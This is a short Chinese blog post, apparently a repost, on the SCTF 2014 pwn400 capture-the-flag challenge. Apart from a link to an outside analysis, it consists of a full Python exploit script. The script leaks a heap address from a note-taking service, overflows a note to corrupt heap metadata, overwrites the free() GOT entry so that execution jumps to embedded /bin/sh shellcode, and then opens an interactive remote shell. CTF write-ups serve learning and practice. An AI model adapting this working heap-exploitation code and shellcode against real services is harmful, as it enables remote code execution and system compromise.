标签:
这个题目在这个链接中分析得很透彻,不再多余地写了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400
exploit:
from socket import * import struct import time shellcode = "\x90\x90\x90\x90\x90\x90"+"\xeb\x08"+"AAAA"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80" sock = socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.200.7", 10001)) time.sleep(1) print sock.recv(1024) #new two note: 2, 1 for i in xrange(2): sock.send(‘1\n‘) time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ‘\n‘) time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ‘\n‘) time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ‘\n‘) time.sleep(1) sock.recv(1024) #new the third note: 3 sock.send(‘1\n‘) time.sleep(1) sock.recv(1024) sock.send(‘3\n‘) time.sleep(1) sock.recv(1024) sock.send(‘3\n‘) time.sleep(1) sock.recv(1024) time.sleep(1) #store shellcode in note 3 sock.send(shellcode+"\n") #get the note 1‘s address sock.send(‘3\n‘) time.sleep(1) print sock.recv(100) sock.send(‘1\n‘) time.sleep(1) note1_addr = sock.recv(2048) while note1_addr.find(‘location:‘) == -1: note1_addr += sock.recv(2048) print note1_addr note1_addr = note1_addr[note1_addr.find(‘location:‘) + 11:] note1_addr = note1_addr[:note1_addr.find(‘\n‘)] addr1 = int(note1_addr, 16) print addr1 #note 2‘s address addr2 = addr1 + 0x170 #note 3‘s address addr3 = addr2 + 0x170 #shellcode‘s address addr_shellcode = struct.pack("<I", addr3 + 0x6c) #free()‘s Got: 0x0804a450 exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"\x4c\xa4\x04\x08" #edit note 1 sock.send("4\n") time.sleep(1) print sock.recv(1024) sock.send("1\n") time.sleep(1) print sock.recv(1024) sock.send(exploit+"\n") time.sleep(1) print sock.recv(1024) #delete node 2 sock.send("5\n") time.sleep(1) sock.recv(1024) time.sleep(1) sock.send(hex(addr2)[2:10]+‘\n‘) time.sleep(1) sock.recv(1024) while True: sock.send(raw_input(‘$ ‘) + ‘\n‘) time.sleep(1) temp = sock.recv(2048) print temp
标签:
原文地址:http://www.cnblogs.com/wangaohui/p/4395133.html